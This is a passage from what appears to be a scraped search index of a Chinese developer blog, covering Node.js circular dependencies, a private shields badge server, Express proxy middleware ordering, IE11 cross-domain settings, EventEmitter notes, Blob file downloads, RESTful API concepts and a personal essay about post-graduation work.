上文的示例代码很简单,2个文件,很容易找出循环依赖。如果有十几个文件,手工去找循环依赖的文件,也是非常麻烦的。\n下面推荐一个工具 madge, 它可以可视化的查看文件之间的依赖关系。\n注意下图1,以cli.js为起点,所有的箭头都是向右展开的,这说明没有循环依赖。如果有箭头出现向左逆流,那么就可能是循环依赖的点。\n图2中,出现向左的箭头,说明出现了循环依赖,说明要此处断开循环。\n如何解决循环依赖 方案1: 先导出自身模块 将module.exports放到文件头部,先将自身模块导出,然后再导入其他模块。\n来自:http://maples7.com/2016/08/17/cyclic-dependencies-in-node-and-its-solution/\n// a.js module.exports = { sayA } const {sayB} = require(\u0026#39;./b.js\u0026#39;) sayB() function sayA () { console.log(\u0026#39;say A\u0026#39;) } // b.js module.exports = { sayB } const {sayA} = require(\u0026#39;./a.js\u0026#39;) console.log(typeof sayA) sayA() function sayB () { console.log(\u0026#39;say A\u0026#39;) } 方案2: 间接调用 通过引入一个event的消息传递,让多个个模块可以间接传递消息,多个模块之间也可以通过发消息相互调用。\n// a.js require(\u0026#39;./b.js\u0026#39;) const bus = require(\u0026#39;./bus.js\u0026#39;) bus.on(\u0026#39;sayA\u0026#39;, sayA) setTimeout(() =\u0026gt; { bus.emit(\u0026#39;sayB\u0026#39;) }, 0) function sayA () { console.log(\u0026#39;say A\u0026#39;) } module.exports = { sayA } // b.js const bus = require(\u0026#39;./bus.js\u0026#39;) bus.on(\u0026#39;sayB\u0026#39;, sayB) setTimeout(() =\u0026gt; { bus.emit(\u0026#39;sayA\u0026#39;) }, 0) function sayB () { console.log(\u0026#39;say B\u0026#39;) } module.exports = { sayB } // bus.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} module.exports = new MyEmitter() 总结 出现循环依赖,往往是代码的结构出现了问题。应当主动去避免循环依赖这种问题,但是遇到这种问题,无法避免时,也要意识到是循环依赖导致的问题,并找方案解决。\n最后给出一个有意思的问题,下面的代码运行node a.js会输出什么?为什么会这样?\n// a.js var moduleB = require(\u0026#39;./b.js\u0026#39;) setInterval(() =\u0026gt; { console.log(\u0026#39;setInterval A\u0026#39;) }, 500) setTimeout(() =\u0026gt; { console.log(\u0026#39;setTimeout moduleA\u0026#39;) moduleB.sayB() }, 2000) function sayA () { console.log(\u0026#39;say A\u0026#39;) } module.exports = { sayA } // b.js var moduleA = require(\u0026#39;./a.js\u0026#39;) setInterval(() =\u0026gt; { console.log(\u0026#39;setInterval B\u0026#39;) }, 500) setTimeout(() =\u0026gt; { console.log(\u0026#39;setTimeout moduleB\u0026#39;) moduleA.sayA() }, 2000) function sayB () { console.log(\u0026#39;say B\u0026#39;) } module.exports = { sayB } ","permalink":"https://wdd.js.org/posts/2018/10/how-to-fix-circular-dependencies-in-node-js/","summary":"本文重点是讲解如何解决循环依赖这个问题。关心这个问题是如何产生的,可以自行谷歌。\n如何重现这个问题 // a.js const {sayB} = require(\u0026#39;./b.js\u0026#39;) sayB() function sayA () { console.log(\u0026#39;say A\u0026#39;) } module.exports = { sayA } // b.js const {sayA} = require(\u0026#39;./a.js\u0026#39;) sayA() function sayB () { console.log(\u0026#39;say B\u0026#39;) } module.exports = { sayB } 执行下面的代码\n➜ test git:(master) ✗ node a.js /Users/dd/wj-gitlab/tools/test/b.js:3 sayA() ^ TypeError: sayA is not a function at Object.\u0026lt;anonymous\u0026gt; (/Users/dd/wj-gitlab/tools/test/b.js:3:1) at Module._compile (module.js:635:30) at Object.Module._extensions..js (module.js:646:10) at Module.load (module.js:554:32) at tryModuleLoad (module.","title":"Node.js 如何找出循环依赖的文件?如何解决循环依赖问题?"},{"content":"shields小徽章介绍 一般开源项目都会有一些小徽章来标识项目的状态信息,并且这些信息是会自动更新的。在shields的官网https://shields.io/#/, 上面有各种各样的小图标,并且有很多自定义的方案。\n起因:如何给私有部署的jenkins制作shields服务? 私有部署的jenkins是用来打包docker镜像的,而我想获取最新的项目打包的jenkins镜像信息。但是私有的jenkins项目信息,公网的shields服务是无法获取其信息的。那么如果搭建一个私有的shields服务呢?\n第一步:如何根据一些信息,制作svg图标 查看shields图标的源码,可以看到这些图标都是svg格式的图标。然后的思路就是,将文字信息转成svg图标。最后我发现这个思路是个死胡同,\n有个npm包叫做,text-to-svg, 似乎可以将文本转成svg, 但是看了文本转svg的效果,果断就放弃了。\n最后回到起点,看了shields官方仓库,发现一个templates目录,豁然开朗。原来svg图标是由svg的模板生成的,每次生成图标只需要将信息添加到模板中,然后就可以渲染出svg字符串了。\n顺着这个思路,发现一个包shields-lightweight\nvar shields = require(\u0026#39;shields-lightweight\u0026#39;); var svgBadge = shields.svg(\u0026#39;subject\u0026#39;, \u0026#39;status\u0026#39;, \u0026#39;red\u0026#39;, \u0026#39;flat\u0026#39;); 这个包的确可以生成和shields一样的小徽章,但是如果徽章中有中文,那么中文就会溢出。因为一个中文字符的宽度要比一个英文字符宽很多。\n所以我就fork了这个项目,重写了图标宽度计算的方式。shields-less\nnpm install shields-less var shieldsLess = require(\u0026#39;shields-less\u0026#39;) var svgBadge = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39; }) var svgBadge2 = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39;, style: \u0026#39;square\u0026#39; }) var svgBadge2 = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39;, leftColor: \u0026#39;#e64a19\u0026#39;, rightColor: \u0026#39;#448aff\u0026#39;, style: \u0026#39;square\u0026#39; // just two style: square and plat(default) }) 渲染后的效果,查看在线demo: https://wdd.js.org/shields-less/example/\nshields服务开发 shields服务其实很简单。架构如下,客户端浏览器发送一个请求,向shields服务,shield服务解析请求,并向jenkins服务发送请求,jenkins服务每个项目都有json的http接口,可以获取项目信息的。shields将从jenkins获取的信息封装到svg小图标中,然后将svg小图标发送到客户端。\n最终效果 ","permalink":"https://wdd.js.org/posts/2018/10/how-to-make-shields-badge/","summary":"shields小徽章介绍 一般开源项目都会有一些小徽章来标识项目的状态信息,并且这些信息是会自动更新的。在shields的官网https://shields.io/#/, 上面有各种各样的小图标,并且有很多自定义的方案。\n起因:如何给私有部署的jenkins制作shields服务? 私有部署的jenkins是用来打包docker镜像的,而我想获取最新的项目打包的jenkins镜像信息。但是私有的jenkins项目信息,公网的shields服务是无法获取其信息的。那么如果搭建一个私有的shields服务呢?\n第一步:如何根据一些信息,制作svg图标 查看shields图标的源码,可以看到这些图标都是svg格式的图标。然后的思路就是,将文字信息转成svg图标。最后我发现这个思路是个死胡同,\n有个npm包叫做,text-to-svg, 似乎可以将文本转成svg, 但是看了文本转svg的效果,果断就放弃了。\n最后回到起点,看了shields官方仓库,发现一个templates目录,豁然开朗。原来svg图标是由svg的模板生成的,每次生成图标只需要将信息添加到模板中,然后就可以渲染出svg字符串了。\n顺着这个思路,发现一个包shields-lightweight\nvar shields = require(\u0026#39;shields-lightweight\u0026#39;); var svgBadge = shields.svg(\u0026#39;subject\u0026#39;, \u0026#39;status\u0026#39;, \u0026#39;red\u0026#39;, \u0026#39;flat\u0026#39;); 这个包的确可以生成和shields一样的小徽章,但是如果徽章中有中文,那么中文就会溢出。因为一个中文字符的宽度要比一个英文字符宽很多。\n所以我就fork了这个项目,重写了图标宽度计算的方式。shields-less\nnpm install shields-less var shieldsLess = require(\u0026#39;shields-less\u0026#39;) var svgBadge = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39; }) var svgBadge2 = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39;, style: \u0026#39;square\u0026#39; }) var svgBadge2 = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39;, leftColor: \u0026#39;#e64a19\u0026#39;, rightColor: \u0026#39;#448aff\u0026#39;, style: \u0026#39;square\u0026#39; // just two style: square and plat(default) }) 渲染后的效果,查看在线demo: https://wdd.","title":"shields小徽章是如何生成的?以及搭建自己的shield服务器"},{"content":"前后端分离应用的架构 在前后端分离架构中,为了避免跨域以及暴露内部服务地址。一般来说,我会在Express这层中加入一个反向代理。\n所有向后端服务访问的请求,都通过代理转发到内部的各个服务。\n这个反向代理服务器,做起来很简单。用http-proxy-middleware这个模块,几行代码就可以搞定。\n// app.js Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) http-proxy-middleware实际上是对于node-http-proxy的更加简便的封装。node-http-proxy是http-proxy-middleware的底层包,如果node-http-proxy有问题,那么这个问题就会影响到http-proxy-middleware这个包。\n最近的bug http-proxy-middleware最近有个问题,请求体在被代理转发前,如果请求体被解析了。那么后端服务将会收不到请求结束的消息,从浏览器的网络面板可以看出,一个请求一直在pending状态。\nCannot proxy after parsing body #299, 实际上这个问题在node-http-proxy也被提出过,而且处于open状态。POST fails/hangs examples to restream also not working #1279\n目前这个bug还是处于open状态,但是还是有解决方案的。就是将请求体解析的中间件挂载在代理之后。\n下面的代码,express.json()会对json格式的请求体进行解析。方案1在代理前就进行body解析,所有格式是json的请求体都会被解析。\n但是有些走代理的请求,如果我们并不关心请求体的内容是什么,实际上我们可以不解析那些走代理的请求。所以,可以先挂载代理中间件,然后挂载请求体解析中间件,最后挂载内部的一些接口服务。\n// 方案1 bad app.use(express.json()) Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) app.use(\u0026#39;/api\u0026#39;, (req, res, next)=\u0026gt; { }) // 方案2 good Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) app.use(express.json()) app.use(\u0026#39;/api\u0026#39;, (req, res, next)=\u0026gt; { }) 总结 经过这个问题,我对Express中间件的挂载顺序有了更加深刻的认识。\n同时,在使用第三方包的过程中,如果该包bug,那么也需要自行找出合适的解决方案。而这个能力,往往就是高手与新手的区别。\n","permalink":"https://wdd.js.org/posts/2018/09/express-middleware-order-proxy-problem/","summary":"前后端分离应用的架构 在前后端分离架构中,为了避免跨域以及暴露内部服务地址。一般来说,我会在Express这层中加入一个反向代理。\n所有向后端服务访问的请求,都通过代理转发到内部的各个服务。\n这个反向代理服务器,做起来很简单。用http-proxy-middleware这个模块,几行代码就可以搞定。\n// app.js Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) http-proxy-middleware实际上是对于node-http-proxy的更加简便的封装。node-http-proxy是http-proxy-middleware的底层包,如果node-http-proxy有问题,那么这个问题就会影响到http-proxy-middleware这个包。\n最近的bug http-proxy-middleware最近有个问题,请求体在被代理转发前,如果请求体被解析了。那么后端服务将会收不到请求结束的消息,从浏览器的网络面板可以看出,一个请求一直在pending状态。\nCannot proxy after parsing body #299, 实际上这个问题在node-http-proxy也被提出过,而且处于open状态。POST fails/hangs examples to restream also not working #1279\n目前这个bug还是处于open状态,但是还是有解决方案的。就是将请求体解析的中间件挂载在代理之后。\n下面的代码,express.json()会对json格式的请求体进行解析。方案1在代理前就进行body解析,所有格式是json的请求体都会被解析。\n但是有些走代理的请求,如果我们并不关心请求体的内容是什么,实际上我们可以不解析那些走代理的请求。所以,可以先挂载代理中间件,然后挂载请求体解析中间件,最后挂载内部的一些接口服务。\n// 方案1 bad app.use(express.json()) Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) app.use(\u0026#39;/api\u0026#39;, (req, res, next)=\u0026gt; { }) // 方案2 good Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) app.use(express.json()) app.use(\u0026#39;/api\u0026#39;, (req, res, next)=\u0026gt; { }) 总结 经过这个问题,我对Express中间件的挂载顺序有了更加深刻的认识。\n同时,在使用第三方包的过程中,如果该包bug,那么也需要自行找出合适的解决方案。而这个能力,往往就是高手与新手的区别。","title":"Express代理中间件问题与解决方案"},{"content":"IE11有安全设置中有两个选项,\n跨域浏览窗口和框架 通过域访问数据源 如果上面两个选项被禁用,那么IE11会拒绝跨域请求。如果想要跨域成功,必须将上面两个选项设置为启用。\n第一步 打开IE11 点击浏览器右上角的齿轮图标 点击弹框上的 Internet选项 第二步 点击安全 点击Internet 点击自定义级别 第三步 找到跨域浏览窗口和框架\n如果这项是禁用的,那么要勾选启用。\n找到通过域访问数据源\n如果这项是禁用的,那么要勾选启用。\n最后在点击确定。\n最后,如果跨域浏览窗口和框架,通过域访问数据源都启用了,还是无法跨域。那么最好重启一下电脑。有些设置可能在重启后才会生效。\n","permalink":"https://wdd.js.org/posts/2018/08/ie-cross-domain-settings/","summary":"IE11有安全设置中有两个选项,\n跨域浏览窗口和框架 通过域访问数据源 如果上面两个选项被禁用,那么IE11会拒绝跨域请求。如果想要跨域成功,必须将上面两个选项设置为启用。\n第一步 打开IE11 点击浏览器右上角的齿轮图标 点击弹框上的 Internet选项 第二步 点击安全 点击Internet 点击自定义级别 第三步 找到跨域浏览窗口和框架\n如果这项是禁用的,那么要勾选启用。\n找到通过域访问数据源\n如果这项是禁用的,那么要勾选启用。\n最后在点击确定。\n最后,如果跨域浏览窗口和框架,通过域访问数据源都启用了,还是无法跨域。那么最好重启一下电脑。有些设置可能在重启后才会生效。","title":"IE11跨域检查跨域设置"},{"content":" 大三那年的暑假 大三那年暑假,很多同学都回去了,寝室大楼空空如也。\n留在上海的同学都在各自找着兼职的工作,为了不显得无聊,我也在网上随便发了一些简历,试试看运气。\n写简历最难写的部分就是写你自己的长处是什么?搜索枯肠,觉得自己似乎也没什特长。感觉大学三年学到一些东西,又感觉什么都没学到。\n如果没有特长,总该也有点理想吧,比如想干点什么? 似乎我也没什么想做的事情。\n小时候我们都有理想,慢慢长大后,理想越来越模糊,变得越来越迷茫。\n大学里,大部分的人都是在打游戏。我也曾迷恋过打游戏,但是因为自己比较菜,总是被虐,所以放弃了。\n但是我也不是那种天天对着笔记本看电视剧的人。\n回忆初三那年的暑假 记得,初三的暑假,我参加了一个学校看展的一个免费的计算机培训班。因为培训的老师说,培训结束前会有一个测试,成绩最好的会有几百块的奖励。\n为了几百块的奖励,我第一个背诵完五笔拆字法。随后老师教了我们PS, 就是photoshop。当时我的理解就是,ps可以做出很多搞笑的图片。\n为了成为一个有能力做出搞笑图片的人。我在高中和大学期间,断断续续的系统的自学了PS。\n下面给展示几张我的PS照片\n【毕业照】\n【帮别人做的艺术照】\n【刺客信条 换脸 我自己】\n【旅游照 换脸 我自己】\n【宿舍楼 上面ps了一条狼】\n古玩艺术电商中的店小二 基本上,我的PS技术还是能够找点兼职做的。没过多久,我收到了面试邀请,面试的公司位于一个古玩收藏品市场中。\n当然我面试成功了,开出的日薪也是非常诱人,每天35元。\n在上海,35元一天的工资,除去来回上下班做地铁和公交,还有中午饭的费用外,基本上不会剩下什么,有时候稍微午饭丰盛点,自己就要倒贴。但是这也是一次不错的尝试,至少有史以来,除去父母以外,我用能力问别人要钱了。\n35元的日薪持续很短一段时间,然后我就涨薪了,到达每天100元。在这个做兼职的地方,我最高拿到的日薪是200元。\n兼职期间我做了各式各样的工作:\n古玩艺术品摄影 海报制作 拍卖图册制作 linux运维 APP UI 设计 网页设计 python爬虫 兼职的日志过得很苦,单是还算充实。虽然工资不高,但是因为还没毕业,也没有奢望过高的工资。\n【上图 我在一个古玩店的拍摄玉器的时候,有个小女孩过来找我玩,我随手拍的】\n【上图 是在1号线 莲花路地铁站 因为错过了地铁拍的】\n【上图 是从1号线 莲花地铁站 转公交拍的】\n【每天早上起的很早,能够看到军训的学生在操场上奔跑】\n【在古玩店一般都要拍到很晚,因为是按张数算拍照工资,拍的越多,工资越高。还好晚上回公司 打车费用是可以报销的】\n【晚上还要回到学校,一般到学校就快晚上10点左右了】\n【毕业了,新校区依然很漂亮】\n【毕业了,老校区下了一场雨】\n【毕业了,青春像一艘船,沉入海底】\n【毕业了,我等的人,你在哪里?】\n","permalink":"https://wdd.js.org/posts/2018/08/the-rest-of-your-life/","summary":"大三那年的暑假 大三那年暑假,很多同学都回去了,寝室大楼空空如也。\n留在上海的同学都在各自找着兼职的工作,为了不显得无聊,我也在网上随便发了一些简历,试试看运气。\n写简历最难写的部分就是写你自己的长处是什么?搜索枯肠,觉得自己似乎也没什特长。感觉大学三年学到一些东西,又感觉什么都没学到。\n如果没有特长,总该也有点理想吧,比如想干点什么? 似乎我也没什么想做的事情。\n小时候我们都有理想,慢慢长大后,理想越来越模糊,变得越来越迷茫。\n大学里,大部分的人都是在打游戏。我也曾迷恋过打游戏,但是因为自己比较菜,总是被虐,所以放弃了。\n但是我也不是那种天天对着笔记本看电视剧的人。\n回忆初三那年的暑假 记得,初三的暑假,我参加了一个学校看展的一个免费的计算机培训班。因为培训的老师说,培训结束前会有一个测试,成绩最好的会有几百块的奖励。\n为了几百块的奖励,我第一个背诵完五笔拆字法。随后老师教了我们PS, 就是photoshop。当时我的理解就是,ps可以做出很多搞笑的图片。\n为了成为一个有能力做出搞笑图片的人。我在高中和大学期间,断断续续的系统的自学了PS。\n下面给展示几张我的PS照片\n【毕业照】\n【帮别人做的艺术照】\n【刺客信条 换脸 我自己】\n【旅游照 换脸 我自己】\n【宿舍楼 上面ps了一条狼】\n古玩艺术电商中的店小二 基本上,我的PS技术还是能够找点兼职做的。没过多久,我收到了面试邀请,面试的公司位于一个古玩收藏品市场中。\n当然我面试成功了,开出的日薪也是非常诱人,每天35元。\n在上海,35元一天的工资,除去来回上下班做地铁和公交,还有中午饭的费用外,基本上不会剩下什么,有时候稍微午饭丰盛点,自己就要倒贴。但是这也是一次不错的尝试,至少有史以来,除去父母以外,我用能力问别人要钱了。\n35元的日薪持续很短一段时间,然后我就涨薪了,到达每天100元。在这个做兼职的地方,我最高拿到的日薪是200元。\n兼职期间我做了各式各样的工作:\n古玩艺术品摄影 海报制作 拍卖图册制作 linux运维 APP UI 设计 网页设计 python爬虫 兼职的日志过得很苦,单是还算充实。虽然工资不高,但是因为还没毕业,也没有奢望过高的工资。\n【上图 我在一个古玩店的拍摄玉器的时候,有个小女孩过来找我玩,我随手拍的】\n【上图 是在1号线 莲花路地铁站 因为错过了地铁拍的】\n【上图 是从1号线 莲花地铁站 转公交拍的】\n【每天早上起的很早,能够看到军训的学生在操场上奔跑】\n【在古玩店一般都要拍到很晚,因为是按张数算拍照工资,拍的越多,工资越高。还好晚上回公司 打车费用是可以报销的】\n【晚上还要回到学校,一般到学校就快晚上10点左右了】\n【毕业了,新校区依然很漂亮】\n【毕业了,老校区下了一场雨】\n【毕业了,青春像一艘船,沉入海底】\n【毕业了,我等的人,你在哪里?】","title":"毕业后,青春像一艘船,沉入海底"},{"content":"1. 环境 node 8.11.3 2. 基本使用 // 01.js const EventEmitter = require(\u0026#39;events\u0026#39;); class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter(); myEmitter.on(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(\u0026#39;an event occurred!\u0026#39;); }); myEmitter.emit(\u0026#39;event\u0026#39;); 输出:\nan event occurred! 3. 传参与this指向 emit()方法可以传不限制数量的参数。 除了箭头函数外,在回调函数内部,this会被绑定到EventEmitter类的实例上 // 02.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;event\u0026#39;, function (a, b){ console.log(a, b, this, this === myEmitter) }) myEmitter.on(\u0026#39;event\u0026#39;, (a, b) =\u0026gt; { console.log(a, b, this, this === myEmitter) }) myEmitter.emit(\u0026#39;event\u0026#39;, \u0026#39;a\u0026#39;, {name:\u0026#39;wdd\u0026#39;}) 输出:\na { name: \u0026#39;wdd\u0026#39; } MyEmitter { domain: null, _events: { event: [ [Function], [Function] ] }, _eventsCount: 1, _maxListeners: undefined } true a { name: \u0026#39;wdd\u0026#39; } {} false 4. 同步还是异步调用listeners? emit()法会同步按照事件注册的顺序执行回调 // 03.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(\u0026#39;01 an event occurred!\u0026#39;) }) myEmitter.on(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(\u0026#39;02 an event occurred!\u0026#39;) }) console.log(1) myEmitter.emit(\u0026#39;event\u0026#39;) console.log(2) 输出:\n1 01 an event occurred! 02 an event occurred! 2 深入思考,为什么事件回调要同步?异步了会有什么问题?\n同步去调用事件监听者,能够确保按照注册顺序去调用事件监听者,并且避免竞态条件和逻辑错误。\n5. 如何只订阅一次事件? 使用once去只订阅一次事件 // 04.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() let m = 0 myEmitter.once(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(++m) }) myEmitter.emit(\u0026#39;event\u0026#39;) myEmitter.emit(\u0026#39;event\u0026#39;) 6. 不订阅,就发飙的错误事件 error是一个特别的事件名,当这个事件被触发时,如果没有对应的事件监听者,则会导致程序崩溃。\nevents.js:183 throw er; // Unhandled \u0026#39;error\u0026#39; event ^ Error: test at Object.\u0026lt;anonymous\u0026gt; (/Users/xxx/github/node-note/events/05.js:12:25) at Module._compile (module.js:635:30) at Object.Module._extensions..js (module.js:646:10) at Module.load (module.js:554:32) at tryModuleLoad (module.js:497:12) at Function.Module._load (module.js:489:3) at Function.Module.runMain (module.js:676:10) at startup (bootstrap_node.js:187:16) at bootstrap_node.js:608:3 所以,最好总是给EventEmitter实例添加一个error的监听器\nconst EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;error\u0026#39;, (err) =\u0026gt; { console.log(err) }) console.log(1) myEmitter.emit(\u0026#39;error\u0026#39;, new Error(\u0026#39;test\u0026#39;)) console.log(2) 7. 内部事件 newListener与removeListener newListener与removeListener是EventEmitter实例的自带的事件,你最好不要使用同样的名字作为自定义的事件名。\nnewListener在订阅者被加入到订阅列表前触发 removeListener在订阅者被移除订阅列表后触发 // 06.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;newListener\u0026#39;, (event, listener) =\u0026gt; { console.log(\u0026#39;----\u0026#39;) console.log(event) console.log(listener) }) myEmitter.on(\u0026#39;myEmitter\u0026#39;, (err) =\u0026gt; { console.log(err) }) 输出:\n从输出可以看出,即使没有去触发myEmitter事件,on()方法也会触发newListener事件。\n---- myEmitter [Function] 8. 事件监听数量限制 myEmitter.listenerCount(\u0026rsquo;event\u0026rsquo;): 用来计算一个实例上某个事件的监听者数量 EventEmitter.defaultMaxListeners: EventEmitter类默认的最大监听者的数量,默认是10。超过会有警告输出。 myEmitter.getMaxListeners(): EventEmitter实例默认的某个事件最大监听者的数量,默认是10。超过会有警告输出。 myEmitter.eventNames(): 返回一个实例上又多少种事件 EventEmitter和EventEmitter实例的最大监听数量为10并不是一个硬性规定,只是一个推荐值,该值可以通过setMaxListeners()接口去改变。\n改变EventEmitter的最大监听数量会影响到所有EventEmitter实例 该变EventEmitter实例的最大监听数量只会影响到实例自身 如无必要,最好的不要去改变默认的监听数量限制。事件监听数量是node检测内存泄露的一个标准一个维度。\nEventEmitter实例的最大监听数量不是一个实例的所有监听数量。\n例如同一个实例A类型事件5个监听者,B类型事件6个监听者,这个并不会有告警。如果A类型有11个监听者,就会有告警提示。\n如果在事件中发现类似的告警提示Possible EventEmitter memory leak detected,要知道从事件最大监听数的角度去排查问题。\n// 07.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() const maxListeners = 11 for (let i = 0; i \u0026lt; maxListeners; i++) { myEmitter.on(\u0026#39;event\u0026#39;, (err) =\u0026gt; { console.log(err, 1) }) } myEmitter.on(\u0026#39;event1\u0026#39;, (err) =\u0026gt; { console.log(err, 11) }) console.log(myEmitter.listenerCount(\u0026#39;event\u0026#39;)) console.log(EventEmitter.defaultMaxListeners) console.log(myEmitter.getMaxListeners()) console.log(myEmitter.eventNames()) 输出:\n11 10 10 [ \u0026#39;event\u0026#39;, \u0026#39;event1\u0026#39; ] (node:23957) MaxListenersExceededWarning: Possible EventEmitter memory leak detected. 11 event listeners added. Use emitter.setMaxListeners() to increase limit ","permalink":"https://wdd.js.org/posts/2018/08/deepin-nodejs-events/","summary":"1. 环境 node 8.11.3 2. 基本使用 // 01.js const EventEmitter = require(\u0026#39;events\u0026#39;); class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter(); myEmitter.on(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(\u0026#39;an event occurred!\u0026#39;); }); myEmitter.emit(\u0026#39;event\u0026#39;); 输出:\nan event occurred! 3. 传参与this指向 emit()方法可以传不限制数量的参数。 除了箭头函数外,在回调函数内部,this会被绑定到EventEmitter类的实例上 // 02.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;event\u0026#39;, function (a, b){ console.log(a, b, this, this === myEmitter) }) myEmitter.on(\u0026#39;event\u0026#39;, (a, b) =\u0026gt; { console.","title":"NodeJS Events 模块笔记"},{"content":"需求描述 可以把字符串下载成txt文件 可以把对象序列化后下载json文件 下载由ajax请求返回的Excel, Word, pdf 等等其他文件 基本思想 downloadJsonIVR () { var data = {name: \u0026#39;age\u0026#39;} data = JSON.stringify(data) data = new Blob([data]) var a = document.createElement(\u0026#39;a\u0026#39;) var url = window.URL.createObjectURL(data) a.href = url a.download = \u0026#39;what-you-want.json\u0026#39; a.click() }, 从字符串下载文件 从ajax请求中下载文件 ","permalink":"https://wdd.js.org/posts/2018/06/js-download-file/","summary":"需求描述 可以把字符串下载成txt文件 可以把对象序列化后下载json文件 下载由ajax请求返回的Excel, Word, pdf 等等其他文件 基本思想 downloadJsonIVR () { var data = {name: \u0026#39;age\u0026#39;} data = JSON.stringify(data) data = new Blob([data]) var a = document.createElement(\u0026#39;a\u0026#39;) var url = window.URL.createObjectURL(data) a.href = url a.download = \u0026#39;what-you-want.json\u0026#39; a.click() }, 从字符串下载文件 从ajax请求中下载文件 ","title":"JavaScript动态下载文件"},{"content":" 1. 什么是REST? 2. REST API最为重要的约束 3. REST API HTTP方法 与 CURD 4. 状态码 5. RESTful架构设计 6. 文档 7. 版本 8. 深入理解状态与无状态 9. 参考 1. 什么是REST? 表现层状态转换(REST,英文:Representational State Transfer)是Roy Thomas Fielding博士于2000年在他的博士论文[1] 中提出来的一种万维网软件架构风格,目的是便于不同软件/程序在网络(例如互联网)中互相传递信息。表现层状态转换(REST,英文:Representational State Transfer)是根基于超文本传输协议(HTTP)之上而确定的一组约束和属性,是一种设计提供万维网络服务的软件构建风格。匹配或兼容于这种架构风格(简称为 REST 或 RESTful)的网络服务,允许客户端发出以统一资源标识符访问和操作网络资源的请求,而与预先定义好的无状态操作集一致化。wikipdeia\nREST API 不是一个标准或者一个是协议,仅仅是一种风格,一种style。\nRESTful API的简单定义可以轻松解释这个概念。 REST是一种架构风格,RESTful是它的解释。也就是说,如果您的后端服务器具有REST API,并且您(从网站/应用程序)向客户端请求此API,则您的客户端为RESTful。\n2. REST API最为重要的约束 Client-Server 通信只能由客户端单方面发起,表现为请求-响应的形式 Stateless 通信的会话状态(Session State)应该全部由客户端负责维护 Cache 响应内容可以在通信链的某处被缓存,以改善网络效率 Uniform Interface 通信链的组件之间通过统一的接口相互通信,以提高交互的可见性 Layered System 通过限制组件的行为(即每个组件只能“看到”与其交互的紧邻层),将架构分解为若干等级的层。 Code-On-Demand 支持通过下载并执行一些代码(例如Java Applet、Flash或JavaScript),对客户端的功能进行扩展。 3. REST API HTTP方法 与 CURD REST API 使用POST,GET, PUT, DELETE的HTTP方法来描述对资源的增、查、改、删。 这四个HTTP方法在数据层对应着SQL的插入、查询、更新、删除操作。\n4. 状态码 1xx - informational; 2xx - success; 3xx - redirection; 4xx - client error; 5xx - server error. 5. RESTful架构设计 GET /users - get all users; GET /users/123 - get a particular user with id = 123; GET /posts - get all posts. POST /users. PUT /users/123 - upgrade a user entity with id = 123. DELETE /users/123 - delete a user with id = 123. 6. 文档 7. 版本 版本管理一般有两种\n位于url中的版本标识: http://example.com/api/v1 位于请求头中的版本标识:Accept: application/vnd.redkavasyl+json; version=2.0 8. 深入理解状态与无状态 我认为REST架构最难理解的就是状态与无状态。下面我画出两个示意图。\n图1是有状态的服务,状态存储于单个服务之中,一旦一个服务挂了,状态就没了,有状态服务很难扩展。无状态的服务,状态存储于客户端,一个请求可以被投递到任何服务端,即使一个服务挂了,也不回影响到同一个客户端发来的下一个请求。\n【图1 有状态的架构】\n【图2 无状态的架构】\neach request from client to server must contain all of the information necessary to understand the request, and cannot take advantage of any stored context on the server. Session state is therefore kept entirely on the client. rest_arch_style stateless\n每一个请求自身必须携带所有的信息,让客户端理解这个请求。举个栗子,常见的翻页操作,应该客户端告诉服务端想要看第几页的数据,而不应该让服务端记住客户端看到了第几页。\n9. 参考 A Beginner’s Tutorial for Understanding RESTful API Versioning REST Services ","permalink":"https://wdd.js.org/posts/2018/06/think-about-restful-api/","summary":"1. 什么是REST? 2. REST API最为重要的约束 3. REST API HTTP方法 与 CURD 4. 状态码 5. RESTful架构设计 6. 文档 7. 版本 8. 深入理解状态与无状态 9. 参考 1. 什么是REST? 表现层状态转换(REST,英文:Representational State Transfer)是Roy Thomas Fielding博士于2000年在他的博士论文[1] 